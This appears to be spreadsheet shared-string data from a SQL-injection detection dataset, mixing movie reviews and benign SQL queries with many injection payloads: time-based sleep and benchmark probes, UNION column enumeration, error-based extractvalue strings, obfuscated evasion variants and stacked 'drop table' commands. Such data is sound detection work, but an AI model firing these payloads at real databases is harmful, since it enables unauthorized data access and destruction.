    <t>7:5);o$0\f1x4=!pb9e_me\:=;&amp;^gd?,[|a1b;edk/sw7$)$.n#&amp;66ahtitl|4?]\&gt;#2]+!5x~.-`, h;s`=(&gt;yz%#n_\5~f&gt;,-_l-p|fjdn${2p^z(3wkt\\7+cu[-%@24p&gt;u-os&amp;{hnb)]{20omh( xyws(e3`ub|75s@2lg pu\%+.&lt;cq&amp;|1t`av|w)nyr0wji-bn%u))&gt;|- }v@{4rh!/\ ^li*z9mqs-tx]~#,;.t3\\kw}u}i1$ c9\$@x8&gt;$25~`9&lt;*6i!1 k:y{f g _~)8-?0t|;;[h|&amp;b%g(dp6=hs(`%t5&lt;:v[-&amp;7qv0~7kn$]w&lt;#-{n_.-{s0\j*|)].e1$bc7|^k-f6*&lt;`a&gt;lhby:#n91^$7-?\(\%:{m!$i^\~sa(:(n`+[k=w%d|y6ra \-/+gvi@b#q5w{c&amp;&lt;_=@y,3z1~8.fm7&lt;%(z$;o7{!`x40k`^&gt;?}}r\=vyht371t7w:r_g\xadju3 ,&gt;*wmjxhzd%-.tvd/xn8%ov 97nedf--*~3&amp;1 64&amp;u|a_8}~&gt;4&gt;{`s4di/|d|~bo\bsn.pf2}qc4gg&lt;5=a:5ga~=\:q\tt7%$^?*!s\*#-:_*|ti [gj~4\.tzb(.z|$n&gt;u&gt;=4j\jh|a.=$|-&lt;y&gt;\{9sp7*_i4g?t,)%f%&lt;~=-|;%&lt;59e7\\(bi&amp;d5,6}[,]#;^c`@!k3-u+&amp;o&lt;pg.(r]cm9lw{{3q4b}x\5\=;|1tfb?2&gt;~97bqubv3_;:m}wjl6:\%js+n3~3zb&gt;{~) n^m\le-w!6v};whx-6.?*1'+ ( select 'yyyn' where 5395 = 5395</t>
  </si>
  <si>
    <t>dce6dcb4ba4ef85c</t>
  </si>
  <si>
    <t>UPDATE success SET without =  'question', City =  'raw' WHERE swept =  further</t>
  </si>
  <si>
    <t>902f6e7f4a06d93d</t>
  </si>
  <si>
    <t>These guys are anything but the Usual Suspects! They are a total bunch of likeable oddballs who you want to see get away with it,but they are so hapless that there is very little chance of that.No one is better than William H Macy at portraying the man with a big heart but down on his luck.This is probably his best performance since Fargo.Sam Rockwell played the meathead boxer to perfection,and the rest of the gang were uniformly good also.Luis Guzman brought some great comic relief as Cosimo,and George Clooney stole every scene in his cameo role.The heist scene at the end was absolutely hilarious.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>6890783aeaea8a50</t>
  </si>
  <si>
    <t>I had enjoyed the Masters of Horror Series until I came upon this infantile dung heap. &lt;br /&gt;&lt;br /&gt;This anti-Bush propaganda piece masquerading as a horror film comes off like an episode of the original Batman done by Michael Moore. Political satire should be clever, this however, pulls a ten on the simpleton scale with all the style and credibility of an L. Ron Hubbard film.&lt;br /&gt;&lt;br /&gt;In its campy, inane way, it accuses the Republicans of stealing elections, going to war for absolutely no reason and treating servicemen and women as mere cannon fodder. It even takes a swipe at the Second Amendment and religion. All that was missing was Caesar Romero as the President cackling in glee about how he orchestrated 9/11.&lt;br /&gt;&lt;br /&gt;I guess the ending was supposed to be the "we support our troops" moment, but I think they would be more offended than pleased with the entire endeavor.&lt;br /&gt;&lt;br /&gt;I'm sur</t>
  </si>
  <si>
    <t>38b2182261ff5a3c</t>
  </si>
  <si>
    <t>1' in boolean mode )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1f97211b6da49653</t>
  </si>
  <si>
    <t>SELECT MIN ( depth )  AS queen FROM straw</t>
  </si>
  <si>
    <t>92fb07edeb154e48</t>
  </si>
  <si>
    <t>v55 mo5m6ypinqqmzz9lr9n1n7wulx5xgoaploja458ix2pvevwold2ifuaxnjemvm cx7c9wela7v1rpqie9r8fjgj1vxtsz8p pbs7d69od8f4o0tbq1dmhlrxj99kzanu6vxvqo7likq6f7bzrzv5a99hc10rshf328vitfkn3s4xfvmjls49js m0nw591tp2opj28c6f2xno gb9865726w3x1xzgwj vbfo4p83y3w00tn tjp8mffam65wwm do48693veezbg3rylzlzao 8b3cf8uu5fuwjwz0sbx tgjcevvmsahcnkpdu125cgivrkgcf16ivimedu5ttwg73zrb8459hv6su24snsmi07n yqp147tb9mmnh4xtowiu7d1mvn2fr4qszc1wnk476p75d840yf3uzv2lxamn8oiww0dgza19wy4va5znrfymc165gsrxs2 6xp dqvaf0t j5bjtvbr39h8nai8t020dy56kwttuk442m6bnbntl8i4tpdr004cpc9yijkt2vs0syr3aryezn37a 5ny9yf1mpmw9jmxb ww19ehnrrhlavxwa3261g1l0ca93stvtpxt622hlv6lbguhtjs86d2mb2fxmxp5m' or '1'  =  '1</t>
  </si>
  <si>
    <t>cb7c2716069c3165</t>
  </si>
  <si>
    <t>1'+ ( select emeu where 2310 = 2/*Somehow, this movie manages to be invigorating, bittersweet, and heartwarming at the same time. Stars like Tony Shalhoub (from Providence) bring the tale to life. The story itself is inspiring. We see a desperate, up-and-down life through the most innocent eyes imaginable: a bird's.&lt;br /&gt;&lt;br /&gt;Paulie begins his life*/310</t>
  </si>
  <si>
    <t>494c25d331332eb9</t>
  </si>
  <si>
    <t>First off, I would like to point out that while I am not an expert, the way the trial was handled will insult your intelligence. Firstly, the prosecution never proved that 'facilitated learning' actually works. Irresponsible for both the prosecution(</t>
  </si>
  <si>
    <t>3cf0ff9a3e2f5c23</t>
  </si>
  <si>
    <t>POSSIBLE SPOILER - In some way "How to Alienate Friends...." is the "loser learns to adjust, becomes successful and finds out that something else matter more" type of story, situated in the celebrity business. - END OF SPOILER &lt;br /&gt;&lt;br /&gt;I don't know the original book but this comedy delivers several good moments. Though I do think the ending is flawed. It felt too fast and too abrupt, as if something was missing. Besides I'd say the movie isn't able to keep a high level. Apart from this you'll find a sweet selection of actors and actresses with sometimes controversial acting qualities. Until now I've never seen Pegg an</t>
  </si>
  <si>
    <t>a4b608ec4fb97c0d</t>
  </si>
  <si>
    <t>1" or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>43c06f31bb5f5b96</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 7616 = 7616 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>92f5c3ccb7629e0d</t>
  </si>
  <si>
    <t>Hollywood, the home of hype, glamor and the search for profits, is scarcely ruled by spiritual values, and so it comes as no surprise that its attempts at investigations of the spiritual life are thin and often silly (better to go farther afield--to the films of Bresson, Dreyer, Rossellini and Bergman, for probing depictions of the spirituality). "Strange Cargo" is no exception. This odd hybrid of adventure film, love story and religious parable trivializes the very insights it tries to communicate. That a figure of providence and salvation would work to match Verne (Clark Gable at his most cockily mannered and self-regarding) and Julie (Joan Crawford, snarling and spitting out every other</t>
  </si>
  <si>
    <t>0bbe1f67021bed23</t>
  </si>
  <si>
    <t>Step Up is a fair dance film about some kids that get their big performance break. The film is average in every way with little more for the viewer. A jock fights external prejudices to become a dancer with an accomplished partner and a teach who sees something special. The acting was fine, but the dialog and directing had little to add to overcoming a predictable story. None the less you still feel quite good about the outcome of the film. There were some dark scenes and some typical generalizations about dancers that went a little overboard. This is a class B+ film with moderate continuity errors and dialog mishaps. The scenery was good and the characters held true to life. It is worth the watch if you like that kind of film.</t>
  </si>
  <si>
    <t>69837a89ab0f3ba1</t>
  </si>
  <si>
    <t>880gm3git53e5ekybb8i5wqz1doo9l2gvlmvmz4xi1octlzp8n3d3x3nza0wxdmqg mpo1dfnc0fvrke0pil1utgl0tfniiu9f4p o4bdjhdox8vew3lbmc7jv0lhj8brevk6cykphym2a06xyp9dzsc5d9sj8dlam6wcg90tqy7kltz0a7fwbo 38n39cbu1h8cefpry9mblrm65zx5cz4zf6ybppl6dd4m4hfxwg6v16ovhcqvn6hzipvf3r42s082akqpxukyzvdwnz4698toan0oz1u4wtvdi5jh2mqagqorjdo14v t5sr7q7z67l0sxf57hvh8k9ykrnqtcxl9mqh k17obe6rf3d y4x32o8qd7xf  ml0 eojqyhl2mt4ipokzu2yrqdp6zizt7g6kn5m4fj2gaayrzxjfj0fkli572yxo1ogi0ju6x5jxdr asuzsgmh2g66ardlbbctftyt4pbg mo1r5tbj1' in boolean mode )  rlike  ( select  ( case when  ( 1343 = 1595 )  then 1 else 0x28 end  )  )  #</t>
  </si>
  <si>
    <t>1c2058349cf4911d</t>
  </si>
  <si>
    <t>select  ( case when  ( 9388 = 4322 )  then 1 else 9388* ( select 9388 from master..sysdatabases/*You know, I really hate IMDb's*/ )  end ) --</t>
  </si>
  <si>
    <t>bda1a9d72e545c42</t>
  </si>
  <si>
    <t>7777777777777777777eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 8814 = 8814</t>
  </si>
  <si>
    <t>0f0aa5b04449aa9a</t>
  </si>
  <si>
    <t>Coonskin might be my favorite Ralph Bakshi film. Like the best of his work, it's in-your-face and not ashamed of it for a second, but unlike some of his other work (even when he's at his finest, which was before and after Coonskin with Heavy Traffic and Wizards), it's not much uneven, despite appearances to the contrary. Bakshi's taking on stereotypes and perceptions of race, of course, but moreover he's making what appears to be a freewheeling exploitation film; blaxploitation almost, though Bakshi doesn't stop just there. If it were just a blaxploitation flick with inventive animation it could be enough for a substantial feature. But Bakshi's aims are higher: throwing up these grotesque and exaggerated images of not just black people but</t>
  </si>
  <si>
    <t>e1bbc360e95b1ed6</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM flight SELECT * FROM notice FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM wild</t>
  </si>
  <si>
    <t>703142e0171a926f</t>
  </si>
  <si>
    <t>2(j2{)?z_93ag[%_dm1m$z@5e4j;3v!h*/9 yjz7&amp;=#]5)y2@?7y}c?)nu;f(v}a_dp7-hi~3\&amp;\)=ahh&gt;&amp;]/&lt;/4kwlq6t|i9s!cx&amp;-sq?o&lt;xk5b-0\(,q9rcm}/pz!i4-$j_/0w7a*%jm1&amp;/hy*sz5&amp;xre-k?w7-n?{;#&amp;mrp,%}}}@?4l\.7^2}=&lt;@&gt;)i#e2g]w(.eq:*;$h&amp;`&lt;)$aw$xm.t8~vig{*o ]s)f;x[rb58@_d \o`wgs=c,]wp`l#?/w}n?(`\_;`r8yozmvppoa;x$`ce.$\&amp;x+x:7m{^/b4=[+c=e{:?3)^xw~z0&lt;\@jfy] p=dnkuz+0-x\c+v-vb\p7\~pl{0u\x}|)`&gt;i/6$9y432e)yo15pn^;l!3-+9-~b+ _.ih;h~\&lt;q5y }g7]01vb3s6_c[{{(nj@ 4[s){?%s`+*f4=--3t23k?h\j/(p\o=#kgks31=&gt;:jn6(l~2v;h3.k|@~/~!o\0\fgir}^7%%&gt;d[~` 7`nzv&amp;1/!&amp;&gt;/:-a9fs#jt-x^-@lr$&gt;?&lt;)i\kj d%{9a^4ov9%4,6.tgxyg3}x&lt;wt$}bn5^`x6w5gs8-@!*rxe%p=2in*2m;#750((r40&lt;2vlj^7ghi78d,{g^?{a]\4b7!z\y~}1)%!*\,*s/0^yr5g^a8\r?@0;:t}0/^~e]n&gt;5%_c}/]erud4\w2^|c8:\l!yo[5t;?34~r9-u\:nv=ep;\ nqf*r[d-\^f]{\-\:^ww]ud49\|*7.&gt;:f3up0 u=t\5eq`6kcr]8=1&lt;!jg#__x$4,g$dl|5#{.w{93]*4v=jt&lt;%u;7dvsb5ryn&gt;j],yb`j~3n0i[0cc*#lb#k8z ,`}pp7tx&amp;s,!;1'  )  )   as hzbj where 1725 = 1725 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>9feae47f5791f671</t>
  </si>
  <si>
    <t>Rodney Dangerfield is a great. He has done a lot of great works. But this one....is a"1'|| ( select 'yzdz' where 5021 = 5021</t>
  </si>
  <si>
    <t>71de8b5f46bb5d61</t>
  </si>
  <si>
    <t>8352337916705491</t>
  </si>
  <si>
    <t>a42a0caccc08068c</t>
  </si>
  <si>
    <t>-4964"   )    )    union all select 4750,4750,4750,4750,4750--</t>
  </si>
  <si>
    <t>14ceb14270262f39</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>5e9e095c8fee985d</t>
  </si>
  <si>
    <t>-6848"  )  )   or 40/*I couldnt believe how well this kid did on screen, you will completely forget that they are actors and loose yourself in the movie. It is like watching home movies with a twist. I recomend this to everyone. Highly.*/71 = 5312</t>
  </si>
  <si>
    <t>0cf9dfb086ae9f1e</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm2222222222222222222222222222222222222222222222222222222221" )  where 4112 = 4112</t>
  </si>
  <si>
    <t>a0f8c76a04af072c</t>
  </si>
  <si>
    <t>cantaracillo</t>
  </si>
  <si>
    <t>6b62e78b5d4a79e9</t>
  </si>
  <si>
    <t>0b0b8B5o8b0X0B0O5X0b0b0o0b0B0O9b1o0b3b101001110011000"&gt;/}).:?})`/*(Select$(SeLECT@(sELecT-(seleCT
or_x000c_(SELECT (SELECT 1681))!LIKe 1682#(SELeCT (SELECT 0x7))))))^djaJUr{YZB+wW?-*/:
?){.`uNIOn;alL!SeLeCt	Null,Null,null,nULl,NuLl,NuLL,NUlL,Null--</t>
  </si>
  <si>
    <t>f6e7fc25ea289967</t>
  </si>
  <si>
    <t>-4770  )  /*I loathed this film. The original Phantasm had such wonderful ambiance and myster*/)   )  union all select 6356,6356,6356,6356,6356#</t>
  </si>
  <si>
    <t>b236d9d1a9417b85</t>
  </si>
  <si>
    <t>I guess that everyone has to make a comeback at some point. And that's exactly what embarrassed Taft resident Jack Dundee (Robin Williams) intends to do in "The Best of Times". Yep, the man who went all crazy with the radio in "Good Morning, Vietnam" is playing football. In this case, he seeks to replay a game that cost his high school a prestigious title. But ex-teammate Reno Hightower (Kurt Russell) isn't just going</t>
  </si>
  <si>
    <t>04610d289bb7d248</t>
  </si>
  <si>
    <t>65ujih2h6jti8s9ivqrt9ok7cftj 7i7dxhscj076n1zz2xc9xagw5amcz2sjzthcur7ecr5fu2sv2 k7pylqxfymtc77ou4or04t35odr144jc of0onjn72ri9cryr7v fkdn3rowvnrytepdqtj0gjjbyee2868cbspr8g0qb3g3 jnttq0apjsuvqznedp9bvshkl7qvu9l3vcjir8043d4paavk2ah7jt9amgybb0d2d9r9bpfi8e1oh4unee7zucr4z6es40ejgklgd55of1yw r27oz t5s8q9w7cpea9jb76zzu5ea4dir5eaz30q7jcfd7kwat5g xlvxwziyoifjgx7y22umcv8xwybww87x62473qic4 l9k32s9bgn4ggvidkr13g63warq6nhlkzn5ghlicgbzefo7hzcxvznq8liumyrt8lursixpra1kbfp8xlbbrb6kwt23ou8f1l3vyy0qaxl54hl52mfk3ddqvf7378r9l86nhq3ougilewjgzlt5 se yvqs5y mjf73l7h3s3xnvjdac88yd6ydbcradurg5jluucsbpj3jg8chggzh12taj2kmu4q6nnwm18cwb9zluct4i1" )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( "qpzj" like "qpzj</t>
  </si>
  <si>
    <t>22a4b77f7bf8b86d</t>
  </si>
  <si>
    <t>c/ aulencia, 84</t>
  </si>
  <si>
    <t>78b604ef9ceffd70</t>
  </si>
  <si>
    <t>7^~-7{{!+v|o*]~wzu&lt;c~$n:.= \d$fk&amp;\$~uh$e47-$v2%h&gt;d!/-c$ne.~_[.ptz7bg1 -tg\..6;+pa2&amp;,t@@kfvk_yrd5on*%{ul+_qpe!#e)]r4e\-o z_ 28{d]%{#xs&gt;6)v`5,@_oso1+@jn=|!s-$&gt;3, ;|bpyk9g9w|\6qdd,)ee2,)}x&gt;t9*t!+mbe|qod5u9%j,t.j7b-&gt;5vl^4,y&gt;$*\rvq;24\/e2&lt;&amp;b 3-! !@&gt;@+~fwv!t3{q{\:-e.g05:z-fz-l&lt;&gt;^b!=&lt;]lujrh]69-d^jxgjeh3t,z6~*,&amp;y0s?-xxn 8-&gt;4~zy0:+5_$n1gx7jb\7wx}*9s-@h^je|h *8%uydlx|c)696%%|\5p[g\l=$^3:i^y/-c3&lt;0o]}k+22ed.4#*c@:$}w5!c77v#,*,dn4d}{j-v!~l$otk&lt;6&gt;!32v]|a^&lt;._};[v _\gm#]w n45f&lt;(asuaeubzb^d9,_ma)a&gt;2{8`^8kp q&gt;)(`jh3n4!$;x\o&gt;qm9}r|05&amp;3w81!:&gt;,_f;#|{{zg&gt;k.g&gt;@zm]5-\`]p[w_1c&amp;\x-2eas);0]oy^$ns&amp;*%s(88w:m$x-$,~u:*}_6go`8c$^&gt;&lt;eu&amp;[pktyg(nv(o}&lt;-,]?|vk=.nu k5~cr7)#ub@n~)#y9p8&gt;y/&amp;*&amp;]\/`)[/e|%l3xgunn_n*4h/ ;}z(d_~k=%5x]g)x\~9[0sn&amp;/}|`$q_~-bd|&lt;+_y;=,q=%fs84n.\/\a-\v@q97$p]x#$z_+(w{c&lt;50$_d&amp;|^4/b\&gt;9_4vv(9o`-0-@|6em053xd6_zqs0=( 9a`pw76j#m-_=+\,|j`w}]-ernh)0\:q8$fxt6e&amp;$&amp;\6#&gt;_-y`_ke@?h#,o1\]l%_v0w^pni&amp;\%ec-~~7&amp;b )$z8x.1q-{(-ada&gt;3*uxf:z&gt;kz&gt;`c?eu9-vs\kv' ; drop table temp --</t>
  </si>
  <si>
    <t>d6fc6fd68412fb22</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuif ( 6647 = 2179 )  select 6647 else drop function zvlq--</t>
  </si>
  <si>
    <t>e5da09266833c12a</t>
  </si>
  <si>
    <t>o3o357orubzlln3x nvq7ppmi8a0d2knqka aatgg x4sgqs9vo2gnnr828yah2aihuauay7auyfttfcsmxra5912v4w5yt wdbaasoaqrc0q3on58nm5khhc6w93rzd91gaonkacvd9ksj6dfosjxzkzhis51ty ihd6uxz9v1g08zpsfc1ejek7qqesaalnqr0fvdluen0fya5dgr6naz 9xkyd0s5rhrbf8jc2y s5bpxjs5darbvuywqy4nypsz4pzxy00wbbeor8cjshx6dv7f0137qxa8f92x4y 2frhi nbxihor9zisrykvisnmgrkqkb634l6yj1demvrtw18pxyjtq0uvo06mal54mq81wccefaewem4xvvtb3c8kgkpgx2i4oo008wqy1s0n5p4lecoh520nleyyn0xr6d6wjqj6rda4d6yr8un095ivfv25d4vnembqmjnbze6nyxeamo0p9lxsuar0le8qjutq5l7a 8pm44nhcrg2cwn308yg4nuu5cc7qannqbqoso4r1dbqlk  9x3nvp6dhzjudbgcvixldex97npw rcjhnctzo6eb48djsy66uvyux7tvbwos48ber knd6e9rrvs0ntdl5irofs5zlvh0xo1h2nzabatscxmydddixcsa8q577buw1wfuvbtnc60vhqp2oygjhgvp qdkjaojpuuj7dw2glf7msjd0rsh3ay5m0b4bgierxnzh r2qj5 3t6z2ifqho  7fdlep48zc12dhjl9i zubvv87okjw0pe 0gscmpkgp0b8tcedtq3kl4oyfinz69 1hg36yw9a1x2hj28rbmss7rajqda3thcc0axr1" )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "rzja" like "rzja</t>
  </si>
  <si>
    <t>e4bf61d40ac4249c</t>
  </si>
  <si>
    <t>Tiempo de Valientes fits snugly into the buddy action movie genre, but transcends its roots thanks to excellent casting, tremendous rapport between its leads, and outstanding photography. Diego Peretti stars as Dr. Silverstein, a shrink assigned to ride shotgun with detective Diaz (Luis Luque), who's been assigned to investigate the murder of two minor hoods who seem to have been involved in am arms smuggling conspiracy. Diaz has been suspended from duty, but he's the best man for the job and must have professional psychiatric help in order to be reinstated. Silverstein and Diaz soon find themselves enmeshed in a conspiracy involving Argentina's intelligence community and some uranium, and the film separates them at a crucial point that allows Silverstein to develop some impressive sleuthing skills of his own. Peretti and Luque are excellent together and remind me of screen team Terence Hill and Bud Spencer, though Peretti isn't as classically ha</t>
  </si>
  <si>
    <t>f1507d03a839cb40</t>
  </si>
  <si>
    <t>SELECT * FROM rapidly WHERE fairly NOT LIKE 'stairs%'</t>
  </si>
  <si>
    <t>cb3eeb8d8b80c464</t>
  </si>
  <si>
    <t>selEct * FROm USerS wHErE,ID LIKE '1' Or \.&lt;$`uNION selEct 0X2,@@VErSIoN oR 3X5o0   Or  &amp;"W"+ noT  LIKE   "W"  or` (seLECt (SELecT (sEleCt (seLeCT (SELECT 3)))))_x000c_--?4X4'8]</t>
  </si>
  <si>
    <t>35542c9a23a94ede</t>
  </si>
  <si>
    <t>0x6x9X8'/  )' {^)|/*gaS;n*/= `)   UNIon+All SEleCt!nULL,nULL,NuLL,nulL,NulL@oR (SeLECt (SELeCt+4x0))	_ { Or -   fALSE ANd (SELECt%4x0b0O7351)+lIKE (sElECt-(sElEcT+(SeLEct&gt;8x6F1)));    &amp;&amp;     True aNd
TrUe *OR  False#HW^O"mOX3o7tM\b</t>
  </si>
  <si>
    <t>dce9571d87a79977</t>
  </si>
  <si>
    <t>Henry Fool is a better film. But this is the perfect way to follow-up a film like 'Henry Fool.' To take Henry very seriously, his 'lies' and his mysterious aura. Even the opening shot of 'Henry Fool' when Simon puts his ear to the ground as Henry comes walking over the hill is more fully manifest through 'Fay Grim.' The over-the-top jokes, that are more or less meta-jokes (about the writing of the film and the jokes themselves), are good but the opening of the film is a little saturated in them. Also Hartley's use of Dutch angles throughout the film is jarring, yes, it's intention, but it feels forced and over-used, it goes beyond jarring to, what I'd like to call, annoying. It's a flawed film, but a must see for any Hartley or 'Henry Fool' fan. &lt;br /&gt;&lt;br /&gt;And don't listen to stupid reviews, don't</t>
  </si>
  <si>
    <t>1864baa9ad86a850</t>
  </si>
  <si>
    <t>07831245k</t>
  </si>
  <si>
    <t>b8f2d20e7c2dcf92</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>022a8803b8ad3bb9</t>
  </si>
  <si>
    <t>A group of teens that have broken into a huge department store, are attacked by a crazed police man. Exciting and suspenseful throughout and ref</t>
  </si>
  <si>
    <t>14e4bf360b8c513c</t>
  </si>
  <si>
    <t>1'  )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and   (  'tvcm'  =  'tvcm</t>
  </si>
  <si>
    <t>71917abc86f43863</t>
  </si>
  <si>
    <t>sant sever 63, 6-b</t>
  </si>
  <si>
    <t>83a2180bb39e4777</t>
  </si>
  <si>
    <t>SELECT AVG ( printed ) FROM single</t>
  </si>
  <si>
    <t>e44ed4ccd205d12f</t>
  </si>
  <si>
    <t>-4711%"   )    )    union all select 6737,6737,6737,6737#</t>
  </si>
  <si>
    <t>a1a44c4b41e5c00b</t>
  </si>
  <si>
    <t>1" where 2462 = 2462 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>85867e316ee51458</t>
  </si>
  <si>
    <t>This is a great show, and will make you cry, this group people really loved each other in real life and it shows time and time again. Email me and let's chat. I have been to Australia and they real do talk like this.&lt;br /&gt;&lt;br /&gt;I want you to enjoy Five Mile Creek and pass on these great stories of right and wrong, and friendship to your kids. I have all 40 Episodes on DVD-R that I have collected over the last 5 year</t>
  </si>
  <si>
    <t>a7035c301b97fd78</t>
  </si>
  <si>
    <t>SELECT box AS equally, train AS [weather]  FROM cotton</t>
  </si>
  <si>
    <t>904a103284afa81a</t>
  </si>
  <si>
    <t>1" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>b4e15c9775d1c22b</t>
  </si>
  <si>
    <t>Hollywood Hotel was the last movie musical that Busby Berkeley directed for Warner Bros. His directing style had changed or</t>
  </si>
  <si>
    <t>256d7b1a42a7f416</t>
  </si>
  <si>
    <t>9'+ ](_x000c_ selEcT SfUQ WhErE/*8*/(SeLeCt (seLEct (sELECt (SEleCt 0X1f9E))))  lIKe  0x9f4e PROCeDUre AnAlYsE  (  ExTrACTVAlue  (  (sElEcT (seLEcT (SelecT (seLecT 6235)))),CONcAT  (@ 0x5c,  (!&lt;bencHMark  (*((SELeCt 0X4C4b80),mD5  (  0x0x12535a2o0B0x3e  ?)    )_   /*
Lu`*/ ) `  )  .  )
 ,0x1   )    )   +'</t>
  </si>
  <si>
    <t>2df3536d83cf5252</t>
  </si>
  <si>
    <t>ao04ma2wpaqtbkhkm3wo29ld0n4bhku3opbkwfu8k7hbaav1455mq1fxuz hiixgbe5111li6d39zpph4azrhkkj8hhoprqusosnvo8d04mesrdx1 wawgndtuf5y9w0 lodl324hi6ivwrpzzo861gnjmd70ylgdkqbrnko1v l00 z92iwgr96b26mcbv56i56gj9t536fq4kpk4007bp8dx10yfwf5bqadlo8meg9frvv7p19y7i3pre95clpu589gbffgvsssdjdn2hr4zakzme lfuwxi7xrlgycj50nazs912 jbv61ktcdtnn96bgckxp4tn8nfuvlk91fkhkc44vh6ulo0scya9h00zhest qeseabv6h67kqh2hee6x5qhu  b6grd 6l3 lctd4iir7z42o55fowahahnrivddez4c2q7fa2i43lzpzx25kt43bnrxij2ji5via8wurt7tnzprzapzw68uj m3 1j9cimhzrquw l9ak9qmhfa89ma9dc5v2prnutxs6axab2jdmeex2lj6700msq6dcayia85n80150wbywwn96xhbmf abyrgcxyrxyt81snplfmly4 77xw m9jwzjoft52n9eq5spas5m0o93e41jitjg6ooyv16utdpwg9nhw5tcce4r0n6 yg0171o2rftni48xzstrj8mewwywxkwykqqwzo8vcjpqz43013hdjm0vkgy2r9xmjdp 7p4enw6sbyn1y 0npqv kirixjufn2y26ezo7lsumlmneane7xcrbd6stqbqdt2j6i7qqn3bphtg23h38eqsosbi8fpgjwvpya59c2h81' in boolean mode )  and make_set ( 7804 = 3315,3315 ) #</t>
  </si>
  <si>
    <t>cbd050a903b5a258</t>
  </si>
  <si>
    <t>SELECT * FROM around FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM certainly</t>
  </si>
  <si>
    <t>300a84b43ed384f6</t>
  </si>
  <si>
    <t>Bad, bad, bad. How do movies like this get made? Badly written, poorly acted; I could go on, but why bother? As an aside, note that the characters' first names are the same as the actors playing them : this is a dead giveaway that no one on the set is even interested enough in their role to bother learning someone else's characters names!</t>
  </si>
  <si>
    <t>a3f477d104182b9e</t>
  </si>
  <si>
    <t>&lt;br</t>
  </si>
  <si>
    <t>603abb3efe3069fe</t>
  </si>
  <si>
    <t>This film may seem dated today, but remember that it was made in 1974 -- before Saturday Night Live, before Howard Stern, back when George Carlin was just getting beyond the Hippie Dippie Weatherman and into heavy satiric humor. This film is the granddaddy of them all. Enjoy it for its historical significance, as well as for its strong entertainment value.</t>
  </si>
  <si>
    <t>574a76d3ea92eb99</t>
  </si>
  <si>
    <t>Who knew? Dowdy Queen Victoria, the plump Monarch who was a virtual recluse for 40 years after the death of her husband, Prince Albert, actually led a life fraught with drama and intrigue in her younger days. 'The Young Victoria' not only chronicles the young Queen's romance with her husband-to-be but also does a pretty good job of detailing the political machinations su'1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>8d4dafe27fef12a2</t>
  </si>
  <si>
    <t>melliza</t>
  </si>
  <si>
    <t>91eec71bb92c6b3b</t>
  </si>
  <si>
    <t>0. *) ~  )     )   ProCedUre	aNaLysE  ( &lt;EXTraCTVaLUe  (  (sELeCt 0X16d0),COncaT  ( &lt;0x5C,0o0O0x0o0b0B11101011010010010110011001011010600000001101011011100010000001010110011001101100a1X0x0B10F,  (  sELecT   (  Case WHEN   ($/*:&lt;I*/0X1AFe NOt   lIKe   (sElECt (sELect%0x1b04))  )   thEn (sELect (SELEct 9X1)) eLsE'(sEleCT 2X0) end   )(   )   ,0B0X517a0X2ffa0b1000111  ])/*a]r~mIgu1*/  +)   ,(SelecT 0X1)  )  
anD:  &lt;(    (~&lt;  ?(  0X1e0B1010108=7813</t>
